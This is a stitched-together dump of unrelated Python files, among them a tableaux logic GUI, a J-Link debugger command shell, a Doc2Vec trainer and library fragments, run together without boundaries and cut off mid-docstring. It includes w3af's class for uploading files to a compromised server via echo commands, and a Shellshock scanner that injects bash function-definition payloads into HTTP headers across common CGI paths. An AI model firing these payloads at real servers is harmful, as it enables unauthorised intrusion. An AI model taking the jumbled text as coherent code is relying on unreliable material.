:class:`.KeyBindings` object that only exposes the global key bindings. """ def __init__(self, key_bindings: KeyBindingsBase) -> None: _Proxy.__init__(self) self.key_bindings = key_bindings def _update_cache(self) -> None: """ If one of the original registries was changed. Update our merged version. """ expected_version = self.key_bindings._version if self._last_version != expected_version: bindings2 = KeyBindings() for b in self.key_bindings.bindings: if b.is_global(): bindings2.bindings.append(b) self._bindings2 = bindings2 self._last_version = expected_version from rest_framework.exceptions import APIException class MissingParameterException(APIException): status_code = 422 default_detail = 'Metric id, channel id, start time and end time required' default_code = 'missing_parameter' gusgordon/airmass from airmassc import c_compute_airmass as _compute_airmass from .airmass import compute, from_altitude, water_vapor_col_density from .solar import ( get_solar_spectrum_modtran, get_solar_irradiance, get_ozone_ppm, get_cross_section, get_air_mass_extinction, get_ozone_particle_col_density, get_cloud_attentuation, solar_intensity_time ) ZooAtmosphereGroup/HelloPackages """ EchoLinux.py Copyright 2006 This file is part of w3af, http://w3af.org/ . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import time import w3af.core.controllers.output_manager as om from w3af.core.controllers.payload_transfer.base_payload_transfer import BasePayloadTransfer class EchoLinux(BasePayloadTransfer): """ This is a class that defines how to send a file to a remote server using the "echo" command. """ def __init__(self, exec_method, os): super(EchoLinux, self).__init__(exec_method, os) self._exec_method = exec_method self._os = os self._step = 30 def can_transfer(self): """ This method is used to test if the transfer method works as expected. The implementation of this should transfer 10 bytes and check if they arrived as expected to the other end. """ # Check if echo exists and works as expected res = self._exec_method("/bin/echo -n 'w3af'") if 'w3af' != res: om.out.debug('Remote server returned: "' + res + '" when expecting "w3af".') return False else: return True def estimate_transfer_time(self, size): """ :return: An estimated transfer time for a file with the specified size. """ before = time.time() res = self._exec_method("echo w3af") after = time.time() # Estimate the time... numberOfRequests = size / self._step requestTime = after - before timeTaken = round(requestTime * numberOfRequests) om.out.debug( 'The file transfer will take "' + str(timeTaken) + '" seconds.') return int(timeTaken) def transfer(self, data_str, destination): """ This method is used to transfer the data_str from w3af to the compromised server. """ self._filename = destination # Zeroing destination file self._exec_method('> ' + self._filename) i = 0 while i < len(data_str): # Prepare the command cmd = "/bin/echo -ne " for c in data_str[i:i + self._step]: cmd += '\\\\' + oct(ord(c)).zfill(4) cmd += " >> " + self._filename i += self._step # Send the command to the remote server self._exec_method(cmd) return self.verify_upload(data_str, self._filename) def get_speed(self): """ :return: The transfer speed of the transfer object. It should return a number between 100 (fast) and 1 (slow) """ return 1 from .tensor import * from .mixup import * from .default_collate import * setup.py #!usr/bin/env python from setuptools import find_packages, setup setup( name="clib", version="0.1.9", description="Neural Network module with chainer", url="https://github.com/Swall0w/clib", install_requires=['numpy', 'chainer', 'scikit-image'], license=license, packages=find_packages(exclude=('tests')), test_suite='tests', entry_points=""" [console_scripts] pig = pig.pig:main """, ) num = input()[::-1] num1 = int(num[0]) num2 = int(num[1]) num3 = int(num[2]) for i in range(1,num1+1): for j in range(1,num2+1): for k in range(1,num3+1): result = i*j*k print(f'{i} * {j} * {k} = {result};') #!/usr/bin/env python # coding=utf-8 import urlparse import requests def verify(ip, port=80, name='', timeout=10, types='ip'): ''' payload from awvs decode script: Bash_RCE_Server_Audit.script ''' variants = [ "/", "/administrator.cgi", "/admin.cgi", "/cgi-bin/admin.cgi", "/cgi-bin/FormHandler.cgi", "/cgi-bin/FormMail.cgi", "/cgi-bin/guestbook.cgi", "/cgi-bin/search.cgi", "/cgi-sys/addalink.cgi", "/cgi-sys/entropybanner.cgi", "/cgi-sys/entropysearch.cgi", "/cgi-sys/defaultwebpage.cgi", "/cgi-sys/FormMail-clone.cgi", "/cgi-sys/domainredirect.cgi", "/cgi-bin-sdb/printenv", "/cgi-mod/index.cgi", "/cgi-bin/test.cgi", "/cgi-bin-sdb/printenv" ]; if types == 'ip': url = "{}:{}".format(ip, port) else: url = ip if not url.startswith("http:") or not url.startswith("https:"): url = 'http://' + url parsed_url = urlparse.urlparse(url) base_url = parsed_url.scheme + "://" + parsed_url.netloc info = { 'url': '', 'severity': 'high', 'vuln_name': 'shellshock', 'proof': 'Referer/UA/shellsock/ in headers' } headers = {} headers['Referer'] = '() { ' + 'Referer' + '; }; echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"' headers['User-Agent'] = '() { ' + 'User-Agent' + '; }; echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"' headers['shellshock'] = '() { (a)=>\' echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"' for var in variants: aimed_url = base_url + var try: resp = requests.get(aimed_url, headers=headers, allow_redirects=False, verify=False) html = resp.text if 'acunetixshellshock' in html: info['url'] = aimed_url return info except Exception as e: pass return Falseimport sys from typing import Union, Optional import PySide2 from PySide2.QtGui import QPainter, QPaintEvent, QFontMetrics from PySide2.QtWidgets import QApplication, QMainWindow, QWidget, QPushButton, QTextEdit from PySide2.QtCore import QFile, Qt from src.view.ui_mainwindow import Ui_MainWindow from src.Parser.PropParser import PropParser from src.TableauxBuilder.PropositionalTableauxBuilder import PropositionalTableauxBuilder from src.TableauxBuilder.BaseTableauxBuilder import BaseTableauxBuilder from src.builder_factory import * from src.view.BaseWindow import BaseWindow from src.view.InputWindow import InputWindow from src.view.CustomPainter import CustomPainter from src.view.DrawingCalculator import DrawingCalculator def get_child_widget(parent: QWidget, name: str) -> Union[Optional[QWidget], None]: for child in parent.children(): if child.objectName() == name: return child sub_child = get_child_widget(child, name) if sub_child is not None: return sub_child return None def curry(function, *c_args, **c_kwargs): def curried(*args, **kwargs): return function(*c_args, *args, **c_kwargs, **kwargs) return curried class ResolveMode: Automatic = 1 Manual = 2 class MainWindow(BaseWindow): input_window = None def __init__(self): super().__init__() self.ui = Ui_MainWindow() self.ui.setupUi(self) self.mode = ResolveMode.Automatic # create reset button in code to put it over scroll area self.reset_btn = QPushButton(self) self.reset_btn.setText('Reset') self.reset_btn.setGeometry(16, 118, 45, 28) self.reset_btn.show() # setup slots self.ui.pl_radio_btn.toggled.connect(self.logic_changed) self.ui.fopl_radio_btn.toggled.connect(self.logic_changed) self.ui.ipl_radio_btn.toggled.connect(self.logic_changed) self.ui.ifopl_radio_btn.toggled.connect(self.logic_changed) self.ui.automatic_radio_btn.toggled.connect(self.mode_changed) self.ui.manual_radio_btn.toggled.connect(self.mode_changed) self.ui.start_calc_btn.clicked.connect(self.calculate_pressed) self.ui.help_button.clicked.connect(self.show_help) self.reset_btn.clicked.connect(self.reset) # subscribe to draw events self.scroll_area_content = self.ui.scrollAreaWidgetContents self.scroll_area_content.installEventFilter(self) self.row_height = 50 self.margin = 10 self.d_margin = 2 * self.margin # size of the scroll area content self.max_width = 700 self.max_height = 400 self.tableaux_builder: BaseTableauxBuilder = None self.expr_btns = dict() def eventFilter(self, watched: PySide2.QtCore.QObject, event: PySide2.QtCore.QEvent): if watched is self.scroll_area_content and type(event) is QPaintEvent: p = CustomPainter(self.scroll_area_content) p.begin() if self.tableaux_builder is None: # no expression entered yet p.draw_tableau_header(self.logic_type) p.end() return False # calculate horizontal center width_l, width_r = self.tableaux_builder.get_drawn_width( p.get_text_width, self.d_margin, self.mode == ResolveMode.Manual) x = width_l + self.d_margin x = max(x, self.d_margin + 125) # ensure space to border p.drawLine(x - 125, 75, x + 125, 75) p.drawLine(x, 25, x, 125) p.drawText(x - 65, 50, self.tableaux_builder.left_side_sign) p.drawText(x + 62, 50, self.tableaux_builder.right_side_sign) manual = self.mode == ResolveMode.Manual intuitionistic = self.logic_type in [LogicType.IPROPOSITIONAL, LogicType.IFOPL] drawing_calculator = DrawingCalculator( self.tableaux_builder, p, manual, intuitionistic, self.margin, x ) self.draw_path(p, self.tableaux_builder, drawing_calculator, x=x) p.end() self.scroll_area_content.setMinimumSize(self.max_width + self.d_margin, self.max_height + self.d_margin) return False def get_y(self, layer): """ Returns the vertical position of the given layer """ return 125 + self.row_height * layer def manually_entered(self, success): self.input_window = None for k, btn in self.expr_btns.items(): btn.hide() del btn self.expr_btns = dict() self.scroll_area_content.repaint() def manual_btn_pressed_wrapper(self, expr, tableau): def manual_btn_pressed(): if self.input_window is not None: return self.input_window = InputWindow(self.manually_entered, self.logic_type, expr, tableau) self.input_window.show() return manual_btn_pressed def draw_btn(self, painter, tableau): def draw_btn(text, x, y, expr): if (x,y) not in self.expr_btns: btn = QPushButton(self.scroll_area_content) btn.show() btn.setFont(painter.btn_font) btn.setText(text.replace('&', '&&')) btn.setGeometry(x, y - 20, painter.get_text_width(text), 26) btn.clicked.connect(self.manual_btn_pressed_wrapper(expr, tableau)) self.expr_btns[(x,y)] = btn return draw_btn def draw_path( self, p: CustomPainter, tableau: BaseTableauxBuilder, drawing_calculator, layer=0, x=375): """ Draws all expressions in the tableau """ expr_pos = drawing_calculator.calc_expr_positions(self.draw_btn) # draw expressions for pos_x, expr, draw_fun, expr_str in expr_pos: y_1 = self.get_y(layer) y_2 = self.get_y(layer+1) draw_fun(expr_str, pos_x, y_1) p.drawLine(x, y_1, x, y_2) layer += 1 # update max width/height txt_width = p.get_text_width(expr_str) self.max_width = max(self.max_width, pos_x + txt_width) self.max_height = max(self.max_height, y_2) if len(tableau.children) == 0: # draw end sign of the branch if drawing_calculator.closed: width = 10 y = self.get_y(layer) p.drawLine(x - width, y, x + width, y) if drawing_calculator.done and not drawing_calculator.closed: diameter = 10 p.drawEllipse(x - diameter / 2, self.get_y(layer), diameter, diameter) return if len(tableau.children) == 1 and tableau.children[0].clears_false_exprs: # only a single child that clears false expressions child = tableau.children[0] width_l, width_r = child.get_drawn_width(p.get_text_width, self.d_margin, drawing_calculator.manual) y = self.get_y(layer) p.drawLine(x - width_l, y, x + width_r, y) p.drawLine(x, y, x, self.get_y(layer+1)) self.draw_path(p, child, drawing_calculator.get_child(0, x), layer+1, x) return # draw left branch y = self.get_y(layer) left = tableau.children[0] width_l, width_r = left.get_drawn_width(p.get_text_width, self.d_margin, drawing_calculator.manual) new_x = x - width_r - self.d_margin x_1 = new_x - width_l - self.d_margin if left.clears_false_exprs else new_x p.drawLine(x, y, x_1, y) p.drawLine(new_x, y, new_x, self.get_y(layer+1)) self.draw_path(p, left, drawing_calculator.get_child(0, new_x), layer+1, new_x) # draw right branch right = tableau.children[1] width_l, width_r = right.get_drawn_width(p.get_text_width, self.d_margin, drawing_calculator.manual) new_x = x + width_l + self.d_margin x_1 = new_x + width_r + self.d_margin if right.clears_false_exprs else new_x p.drawLine(x, y, x_1, y) p.drawLine(new_x, y, new_x, self.get_y(layer+1)) self.draw_path(p, right, drawing_calculator.get_child(1, new_x), layer+1, new_x) def logic_changed(self): """ This function is called when a logic radio button is toggled """ if self.ui.pl_radio_btn.isChecked(): self.logic_type = LogicType.PROPOSITIONAL if self.ui.fopl_radio_btn.isChecked(): self.logic_type = LogicType.FOPL if self.ui.ipl_radio_btn.isChecked(): self.logic_type = LogicType.IPROPOSITIONAL if self.ui.ifopl_radio_btn.isChecked(): self.logic_type = LogicType.IFOPL self.scroll_area_content.repaint() def mode_changed(self): """ This function is called when a mode button is toggled """ if self.ui.automatic_radio_btn.isChecked(): self.mode = ResolveMode.Automatic if self.ui.manual_radio_btn.isChecked(): self.mode = ResolveMode.Manual def calculate_pressed(self): """ This function is called after the calculate button is pressed """ # get the entered expressions left_exprs = self.parse_exprs(self.ui.inital_left_exprs_text_edit, self.scroll_area_content) right_exprs = self.parse_exprs(self.ui.inital_right_exprs_text_edit, self.scroll_area_content) if left_exprs is None or right_exprs is None: return constants = self.constants_from_trees(left_exprs + right_exprs) functions = self.functions_from_trees(left_exprs + right_exprs) left_exprs = self.exprs_from_trees(left_exprs) right_exprs = self.exprs_from_trees(right_exprs) # create tableau builder with expressions self.tableaux_builder = create_tableau_builder( logic_type=self.logic_type, left_exprs=left_exprs, right_exprs=right_exprs, visit_idx=self.parser.parse_idx, constants=constants, functions=functions, ) # hide widgets to enter initial expressions self.ui.inital_left_exprs_text_edit.hide() self.ui.inital_right_exprs_text_edit.hide() self.ui.start_calc_btn.hide() self.ui.inital_left_exprs_text_edit.setStyleSheet('') self.ui.inital_right_exprs_text_edit.setStyleSheet('') self.ui.logic_type_gb.setEnabled(False) self.ui.calc_mode_gb.setEnabled(False) if self.error_widget is not None: self.error_widget.hide() # if automatic, try to auto resolve the tableau if self.mode == ResolveMode.Automatic: try: self.tableaux_builder.auto_resolve() self.scroll_area_content.repaint() except Exception as e: print(e) self.show_error(self.scroll_area_content, 'No automatic resolution possible'\ '

The automatic resolution failed. Try to calculate the Tableau manually.

') self.reset() self.scroll_area_content.repaint() def reset(self): if self.tableaux_builder is None: self.ui.inital_left_exprs_text_edit.setText('') self.ui.inital_right_exprs_text_edit.setText('') self.tableaux_builder = None self.ui.inital_left_exprs_text_edit.show() self.ui.inital_right_exprs_text_edit.show() self.ui.start_calc_btn.show() self.ui.logic_type_gb.setEnabled(True) self.ui.calc_mode_gb.setEnabled(True) self.ui.start_calc_btn.setEnabled(True) self.max_width = 700 self.max_height = 400 self.scroll_area_content.setMinimumSize(self.max_width + self.d_margin, self.max_height + self.d_margin) for k, btn in self.expr_btns.items(): btn.hide() del btn self.expr_btns = dict() self.scroll_area_content.repaint() if __name__ == '__main__': app = QApplication(sys.argv) window = MainWindow() window.show() sys.exit(app.exec_()) 1-10 #!/usr/bin/env python # -*- encoding: utf-8 -*- # Created on 2017/1/29 20:47 # Project: turboPydDNS # __author__ = 'ihipop' __version__ = '0.1' 0 #!python3 import os import re import sys import ptkcmd import functools import configparser from prompt_toolkit.completion import Completion from prompt_toolkit.shortcuts import yes_no_dialog import jlink import xlink import svd import hardfault import callstack #sys.path.append(sys.exec_prefix + r'\venv\Lib\site-packages') #import ipdb os.environ['PATH'] = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'libusb-1.0.24/MinGW64/dll') + os.pathsep + os.environ['PATH'] class DAPCmdr(ptkcmd.PtkCmd): prompt = 'DAPCmdr > ' intro = '''J-Link and DAPLink Commander v0.6 blank line for connection, ? for help address and value use hexadecimal, count use decimal\n''' def __init__(self): super(DAPCmdr, self).__init__(self) self.initSetting() self.env = { '%pwd%': os.getcwd(), '%home%': os.path.expanduser('~') } self.env.update(self.get_MDK_Packs_path()) def initSetting(self): if not os.path.exists('setting.ini'): open('setting.ini', 'w') self.conf = configparser.ConfigParser() self.conf.read('setting.ini', encoding='utf-8') if not self.conf.has_section('paths'): self.conf.add_section('paths') self.conf.set('paths', 'dllpath', r'C:\Segger\JLink_V692\JLink_x64.dll') self.conf.set('paths', 'svdpath', r'["C:\Keil_v5\ARM\Packs\Keil\STM32F1xx_DFP\2.3.0\SVD\STM32F103xx.svd"]') self.conf.set('paths', 'dispath', r'["D:\Project\STM32_Blinky\out\STM32_Blinky.axf"]') self.conf.write(open('setting.ini', 'w', encoding='utf-8')) self.svdpaths = eval(self.conf.get('paths', 'svdpath')) self.dispaths = eval(self.conf.get('paths', 'dispath')) self.dllpath = self.conf.get('paths', 'dllpath') self.svdpath = self.svdpaths[0] self.dispath = self.dispaths[0] if os.path.isfile(self.svdpath): self.dev = svd.SVD(self.svdpath).device self.mcucore = self.dev.cpu.name else: self.mcucore = 'Cortex-M0' def preloop(self): self.onecmd('path') self.xlk = None self.onecmd('') def emptyline(self): try: if self.xlk == None: try: from pyocd.probe import aggregator from pyocd.coresight import dap, ap, cortex_m daplinks = aggregator.DebugProbeAggregator.get_all_connected_probes() except Exception as e: daplinks = [] if daplinks and os.path.isfile(self.dllpath): use_dap = yes_no_dialog(title='J-Link or DAPLink', text=f'Do you want to use {daplinks[0].product_name}?').run() elif os.path.isfile(self.dllpath): use_dap = False elif daplinks: use_dap = True else: raise Exception('No link found') if use_dap: daplink = daplinks[0] daplink.open() _dp = dap.DebugPort(daplink, None) _dp.init() _dp.power_up_debug() _ap = ap.AHB_AP(_dp, 0) _ap.init() self.xlk = xlink.XLink(cortex_m.CortexM(None, _ap)) else: self.xlk = xlink.XLink(jlink.JLink(self.dllpath, self.mcucore)) else: self.xlk.close() self.xlk.open(self.mcucore) print(f'CPU core is {self.xlk.read_core_type()}\n') except Exception as e: print('connection fail\n') self.xlk = None def connection_required(func): @functools.wraps(func) def wrapper(self, *args, **kwargs): try: self.xlk.read_core_type() except Exception as e: print('no connection established\n') self.xlk = None return try: func(self, *args, **kwargs) except Exception as e: print('command argument error, please check!\n') return wrapper @connection_required def do_rd8(self, addr, cnt): '''Read 8-bit items. Syntax: rd8 \n''' addr, cnt = int(addr, 16), int(cnt, 10) arr = self.xlk.read_mem_U8(addr, cnt) print(''.join(['%02X, ' %x for x in arr]) + '\n') @connection_required def do_rd16(self, addr, cnt): '''Read 16-bit items. Syntax: rd16 \n''' addr, cnt = int(addr, 16), int(cnt, 10) arr = self.xlk.read_mem_U16(addr, cnt) print(''.join(['%04X, ' %x for x in arr]) + '\n') @connection_required def do_rd32(self, addr, cnt): '''Read 32-bit items. Syntax: rd32 \n''' addr, cnt = int(addr, 16), int(cnt, 10) arr = self.xlk.read_mem_U32(addr, cnt) print(''.join(['%08X, ' %x for x in arr]) + '\n') @connection_required def do_wr8(self, addr, val): '''Write 8-bit items. Syntax: wr8 \n''' addr, val = int(addr, 16), int(val, 16) self.xlk.write_U8(addr, val) print() @connection_required def do_wr16(self, addr, val): '''Write 16-bit items. Syntax: wr16 \n''' addr, val = int(addr, 16), int(val, 16) self.xlk.write_U16(addr, val) print() @connection_required def do_wr32(self, addr, val): '''Write 32-bit items. Syntax: wr32 \n''' addr, val = int(addr, 16), int(val, 16) self.xlk.write_U32(addr, val) print() @connection_required def do_loadbin(self, file, addr): '''Load binary file into target memory. Syntax: loadbin \n''' addr = int(addr, 16) with open(file, 'rb') as f: data = f.read() self.xlk.write_mem(addr, data) print() @connection_required def do_savebin(self, file, addr, cnt): '''Save target memory into binary file. Syntax: savebin \n''' addr, cnt = int(addr, 16), int(cnt, 10) with open(file, 'wb') as f: data = self.xlk.read_mem_U8(addr, cnt) f.write(bytes(data)) print() @connection_required def do_regs(self): '''Display core registers value. Syntax: regs Can only exec when Core halted\n''' if not self.xlk.halted(): print('should halt first!\n') return regs = ['R0', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7', 'R8', 'R9', 'R10', 'R11', 'R12', 'SP', 'LR', 'PC', 'MSP', 'PSP', 'XPSR', 'CONTROL' ] vals = self.xlk.read_regs(regs) vals['CONTROL'] >>= 24 # J-Link Control Panel 中显示的也是移位前的 print('R0 : %08X R1 : %08X R2 : %08X R3 : %08X\n' 'R4 : %08X R5 : %08X R6 : %08X R7 : %08X\n' 'R8 : %08X R9 : %08X R10: %08X R11: %08X\n' 'R12: %08X SP : %08X LR : %08X PC : %08X\n' 'MSP: %08X PSP: %08X XPSR: %08X\n' 'CONTROL: %02X (when Thread mode: %s, use %s)\n' %(vals['R0'], vals['R1'], vals['R2'], vals['R3'], vals['R4'], vals['R5'], vals['R6'], vals['R7'], vals['R8'], vals['R9'], vals['R10'], vals['R11'], vals['R12'], vals['SP'], vals['LR'], vals['PC'], vals['MSP'], vals['PSP'], vals['XPSR'], vals['CONTROL'], 'unprivileged' if vals['CONTROL']&1 else 'privileged', 'PSP' if vals['CONTROL']&2 else 'MSP', )) if vals['XPSR'] & 0xFF == 3: if self.xlk.read_core_type() not in ['Cortex-M0', 'Cortex-M0+']: causes = hardfault.diagnosis(self.xlk) print("\n".join(causes)) if (vals['LR'] >> 2) & 1 == 0: fault_SP = vals['MSP'] # 发生HardFault时使用的栈,也就是HardFault异常栈帧所在的栈 else: fault_SP = vals['PSP'] stackMem = self.xlk.read_mem_U32(fault_SP, 64) # 读取个数须是8的整数倍 print(f'\nStack Content @ 0x{fault_SP:08X}:') for i in range(len(stackMem) // 8): print(f'{fault_SP+i*8*4:08X}: {stackMem[i*8]:08X} {stackMem[i*8+1]:08X} {stackMem[i*8+2]:08X} {stackMem[i*8+3]:08X} {stackMem[i*8+4]:08X} {stackMem[i*8+5]:08X} {stackMem[i*8+6]:08X} {stackMem[i*8+7]:08X}') if os.path.isfile(self.dispath): cs = callstack.CallStack(self.dispath) if cs.Functions: print(f'\n{cs.parseStack(stackMem)}\n') @connection_required def do_wreg(self, reg, val): '''Write core register. Syntax: wreg Can only exec when Core halted\n''' if not self.xlk.halted(): print('should halt first!\n') return val = int(val, 16) self.xlk.write_reg(reg, val) print() @connection_required def do_reset(self): '''reset core\n''' self.xlk.reset() print() @connection_required def do_halt(self): '''halt core\n''' self.xlk.halt() self.do_regs() @connection_required def do_go(self): '''resume core\n''' self.xlk.go() print() def do_path(self, subcmd=None, *path): '''display path, Syntax: path set JLink_x64.dll, Syntax: path dll set svd file path, Syntax: path svd set dis file path, Syntax: path dis \n''' if subcmd == None: maxlen = max(len(self.dllpath), len(self.svdpath), len(self.dispath)) print(f'{"√" if os.path.isfile(self.dllpath) else "×"} {self.dllpath:{maxlen}}') print(f'{"√" if os.path.isfile(self.svdpath) else "×"} {self.svdpath:{maxlen}}') print(f'{"√" if os.path.isfile(self.dispath) else "×"} {self.dispath:{maxlen}}\n') else: if path: path = ' '.join(path) match = re.match(r'%\w+%', path) if match: path = path.replace(match.group(0), self.env[match.group(0)]) if os.path.isfile(path): # return True if path is an existing regular file if subcmd == 'dll': self.dllpath = path elif subcmd == 'svd': self.svdpath = path self.dev = svd.SVD(self.svdpath).device self.mcucore = self.dev.cpu.name elif subcmd == 'dis': self.dispath = path else: print(f'{subcmd} Unknown\n') self.saveSetting() else: print('Not exists or Not file\n') else: print('Input error\n') def complete_path(self, pre_args, curr_arg, document, complete_event): if len(pre_args) > 0: if pre_args[0] == 'dll': extra_paths =[self.dllpath] elif pre_args[0] == 'svd': extra_paths = self.svdpaths elif pre_args[0] == 'dis': extra_paths = self.dispaths else: return yield from ptkcmd.complete_path(' '.join([*pre_args[1:], curr_arg]), extra_paths, self.env) @connection_required def do_sv(self, input, val=None): '''svd-based peripheral register read and write register read: sv . register write: sv . register field write: sv .. \n''' obj = self.dev for name in input.split('.'): match = re.match(r'(\w+)\[(\d+)\]', name) name = re.sub(r'(\w+)\[\d+\]', r'\1', name) if name in obj.children: obj = obj.children[name] if isinstance(obj, svd.Peripheral): peri = obj if match and isinstance(obj, svd.RegisterArray): index = int(match.group(2)) if index < len(obj): obj = obj[index] else: print('index Overflow\n') return else: print(f'{name} Unknown\n') return if val == None: if isinstance(obj, svd.Peripheral) or isinstance(obj, svd.Cluster): addr, count = obj.addr, obj.nwrd elif isinstance(obj, svd.RegisterArray): addr, count = obj.addr, len(obj) else: addr, count = obj.addr, 1 if not isinstance(obj, svd.Peripheral): addr += peri.addr if count > 128: print('Too much to read\n') return values = self.xlk.read_mem_U32(addr, count) obj.load_value({addr-peri.addr+i*4: val for i, val in enumerate(values)}) print(obj) else: addr = peri.addr + obj.addr if isinstance(obj, svd.Register): try: val = int(val, 16) except Exception as e: print(f'{val} is not valid hexadecimal\n') return self.xlk.write_U32(addr, val) elif isinstance(obj, svd.Field): try: val = int(val, 10) except Exception as e: print(f'{val} is not valid decimal\n') return value = self.xlk.read_U32(addr) value = value & (~obj.mask) | (val << obj.pos) self.xlk.write_U32(addr, value) else: print('Can only write register and field\n') def complete_sv(self, pre_args, curr_arg, document, complete_event): if len(pre_args) == 0 and curr_arg: obj = self.dev names = curr_arg.split('.') for name in names[:-1]: match = re.match(r'(\w+)\[(\d+)\]', name) name = re.sub(r'(\w+)\[\d+\]', r'\1', name) if name in obj.children: obj = obj.children[name] if match and isinstance(obj, svd.RegisterArray): index = int(match.group(2)) if index < len(obj): obj = obj[index] else: return if isinstance(obj, svd.RegisterArray): return else: return yield from [Completion(name, -len(names[-1])) for name in ptkcmd.fuzzy_match(names[-1], obj.children.keys(), sort=False)] @connection_required def do_dis(self): '''display CallStack information coming from disassembling file. disassembling file can be built by command below: MDK: fromelf --text -a -c -o "$L@L.dis" "#L" IAR: ielfdumparm --code --source $TARGET_PATH$ -o $TARGET_PATH$.dis GCC: objdump -d $@ > $@.dis\n''' if os.path.isfile(self.dispath): cs = callstack.CallStack(self.dispath) if cs.Functions: print(f'{cs}\n') else: print("disassembling file parse Fail\n") else: print("disassembling file Not Exists\n") def do_env(self): '''display enviriment variables\n''' for key, val in self.env.items(): print(f'{key:<10s}{val}') print() def get_MDK_Packs_path(self): try: import winreg key = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, r'UVPROJXFILE\Shell\open\command') val = winreg.QueryValue(key, '') key.Close() # "C:\Programs\uVision\UV4\UV4.exe" "%1" match = re.match(r'"(.+?)\\UV4\\UV4.exe"', val) if match: MDK_path = match.group(1) conf = configparser.ConfigParser() conf.read(os.path.join(MDK_path, 'TOOLS.INI'), encoding='gbk') Packs_path = conf.get('UV2', 'RTEPATH')[1:-1] if os.path.exists(Packs_path): return {'%Packs%': Packs_path} except: return {} def saveSetting(self): self.conf.set('paths', 'dllpath', self.dllpath) if self.svdpath in self.svdpaths: self.svdpaths.remove(self.svdpath) self.svdpaths.insert(0, self.svdpath) self.conf.set('paths', 'svdpath', repr(self.svdpaths[:10])) if self.dispath in self.dispaths: self.dispaths.remove(self.dispath) self.dispaths.insert(0, self.dispath) self.conf.set('paths', 'dispath', repr(self.dispaths[:10])) self.conf.write(open('setting.ini', 'w', encoding='utf-8')) #with ipdb.launch_ipdb_on_exception(): if __name__ == '__main__': cmd = DAPCmdr() cmd.cmdloop() #!/usr/bin/env python3 import unittest from fpmlib.typing import * import os.path from collections import OrderedDict from gensim.models.doc2vec import Doc2Vec, TaggedDocument from .snippet import Snippet from .utils import get_project_root class SnippetTrainer(object): def __init__(self, repo_id, snippets=None, path=None, external=False): self._snippets = snippets or Snippet.load_all(repo_id, merged_only=True, path=path) self.repo_id = repo_id self.external = external self._tokens = [] self._tagged_data = [] @property def snippets(self): """ Snippets used for the training. :return: All the availible snippets. :type: generator """ return iter(self._snippets) @property def tokens(self): """ Snippets used for the training as tokens. :return: List of tokens. :type: list """ if not self._tokens: if self.external: self._tokens = [{'0': self.snippets}] else: self._tokens = [ self._to_tokens(s) for s in self.snippets ] return self._tokens @property def tagged_data(self): if not self._tagged_data: self._tagged_data = list(self._make_tagged_data()) return self._tagged_data def _make_tagged_data(self): chunks_sha1 = set() for snippet in self.snippets: for chunk in snippet.chunks: # Skip chunks that were already added if chunk.sha1_hash in chunks_sha1: continue chunks_sha1.add(chunk.sha1_hash) tagged_line = TaggedDocument(words=chunk.merged_tokens, tags=[chunk.chunk_id]) yield tagged_line @staticmethod def _to_tokens(snippet): """ Represent a whole snippet as a single list of tokens. :type: list """ snippet_lines = [] # Only use target snippets for now for line in snippet.to_tokens(): snippet_lines += line return {snippet.snippet_id: snippet_lines} def evaluate(self, threshold=0.75): path = get_project_root() model_path = os.path.join(path, 'data', str(self.repo_id), 'd2v.model') if not os.path.isfile(model_path): return [] model = Doc2Vec.load(model_path) results = [] for snpt in self.snippets: snippet = OrderedDict() snippet['snippet_id'] = snpt.snippet_id for chnk in snpt.chunks: new_vector = model.infer_vector(chnk.merged_tokens) sims = model.docvecs.most_similar([new_vector]) candidates = [{'chunk_id': snip[0], 'confidence': snip[1]} for snip in sims if snip[1] >= threshold] chunk_info = chnk.to_json() chunk_info['candidates'] = candidates if snippet.get('chunks') is None: snippet['chunks'] = [chunk_info] else: snippet['chunks'].append(chunk_info) results.append(snippet) return results def train(self, iterations=20, force=False, path=None): if path is not None: model_dir = path else: model_dir = os.path.join(get_project_root(), 'data', str(self.repo_id)) model_path = os.path.join(model_dir, 'd2v.model') if not self.tagged_data: print('Nothing to train for: {0}'.format(self.repo_id)) return if force or not os.path.isfile(model_path): if not os.path.isdir(model_dir): os.makedirs(model_dir) print('Building new vocabulary') model = Doc2Vec(vector_size=50, alpha=0.025, # min_alpha=0.00025, min_count=2, dm=0, hs=1) model.build_vocab(self.tagged_data) else: print('Updating existing vocabulary') model = Doc2Vec.load(model_path) # model.trainables.reset_weights(model.hs, model.negative, model.wv, model.docvecs) # model.build_vocab(tagged_data, update=True) self.iterate(iterations, model=model, model_path=model_path) def iterate(self, times, **kwargs): if not times or times < 1: print('No iterations for: {0}'.format(self.repo_id)) return model = kwargs['model'] model_path = kwargs.get('model_path') # Reset iterations model.trainables.reset_weights(model.hs, model.negative, model.wv, model.docvecs) model.train(documents=self.tagged_data, total_examples=model.corpus_count, epochs=times) print('Unique word tokens: {0}'.format(len(model.wv.vocab))) print('Trained document tags: {0}'.format(len(model.docvecs))) model.save(model_path) print('Model saved for: {0}'.format(self.repo_id)) 0 """Distance base classes.""" from abc import ABC, abstractmethod from typing import List, Callable import json from ..sampler import Sampler class Distance(ABC): """ Abstract base class for distance objects. Any object that computes the similarity between observed and simulated data should inherit from this class. """ def initialize( self, t: int, get_all_sum_stats: Callable[[], List[dict]], x_0: dict = None): """ This method is called by the ABCSMC framework before the first use of the distance (at the beginning of ABCSMC.run()), and can be used to calibrate it to the statistics of the samples. The default is to do nothing. Parameters ---------- t: int Time point for which to initialize the distance. get_all_sum_stats: Callable[[], List[dict]] Returns on command the initial 